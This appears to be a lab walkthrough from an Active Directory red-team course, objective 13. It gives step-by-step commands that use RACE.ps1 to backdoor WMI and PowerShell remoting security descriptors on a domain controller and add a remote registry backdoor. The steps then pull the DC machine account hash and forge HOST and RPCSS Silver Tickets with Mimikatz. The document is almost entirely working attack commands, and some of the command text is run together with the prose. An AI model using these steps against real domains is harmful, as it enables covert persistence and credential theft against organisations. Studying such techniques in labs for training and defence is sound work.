Obj 13 Security Descriptors
Task - Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access. Retrieve machine account hash from dcorp-dc with silver ticket.
Once we have administrative privileges on a machine, we can modify security descriptors of services to access the services without administrative privileges. Below command(to be run as Domain Administrator)modifies the host security descriptors for WMI on the DC to allow student access to WMI:
Start a new session, run invishell, and load race.ps1
. C:\AD\Tools\RACE.ps1Set-RemoteWMI -SamAccountNamestudentx-ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -VerboseeNow, we can execute WMI queries on the DC as studentx:
PS C:\AD\Tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.localSimilar modification can be done to PowerShell remoting configuration. (In rare cases, you may get an I/O error while using the below command, please ignore it). Please note that this is unstable since spme patches in August 2020:
Enable PSSRemoting on the DC from the student vm
Set-RemotePSRemoting –SamAccountNamestudentx-ComputerName dcorp-dc.dollarcorp.moneycorp.local -VerboseWe can now run commands using PowerShell remoting on the DC without DA privileges:
Invoke-Command -ScriptBlock{whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.localRetrieve machine account hash without DA
we first need to modify permissions on the DC to allow this. Start a new session as DA and load the race.ps1 script shown above.
Add RemoteBackDoor to DC
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee studentx-VerboseNow we can retrieve the machine hash to use later
. C:\AD\Tools\RACE.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -VerboseWe can use the machine account hash to create Silver Tickets. Create Silver Tickets for HOST and RPCSS using the machine account hash to execute WMI queries:
Create a Silver Ticket as HOST on the DC
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511/target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:731a06658bc10b59d71f5176e93e5710/user:Administrator /ptt"'Create a Silver Ticket as RPCSS on the DC
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511/target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:731a06658bc10b59d71f5176e93e5710/user:Administrator /ptt"'Check to make sure the tickets were made
klistNow we can run WMI queries on the DC
PS C:\AD\Tools> gwmi -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.localLast updated